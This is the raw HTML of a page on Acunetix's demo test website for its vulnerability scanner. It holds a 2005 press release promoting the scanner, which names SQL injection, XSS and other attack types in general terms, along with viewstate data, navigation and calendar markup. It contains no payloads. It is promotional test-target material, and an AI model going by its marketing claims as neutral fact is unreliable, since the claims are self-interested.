CAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td 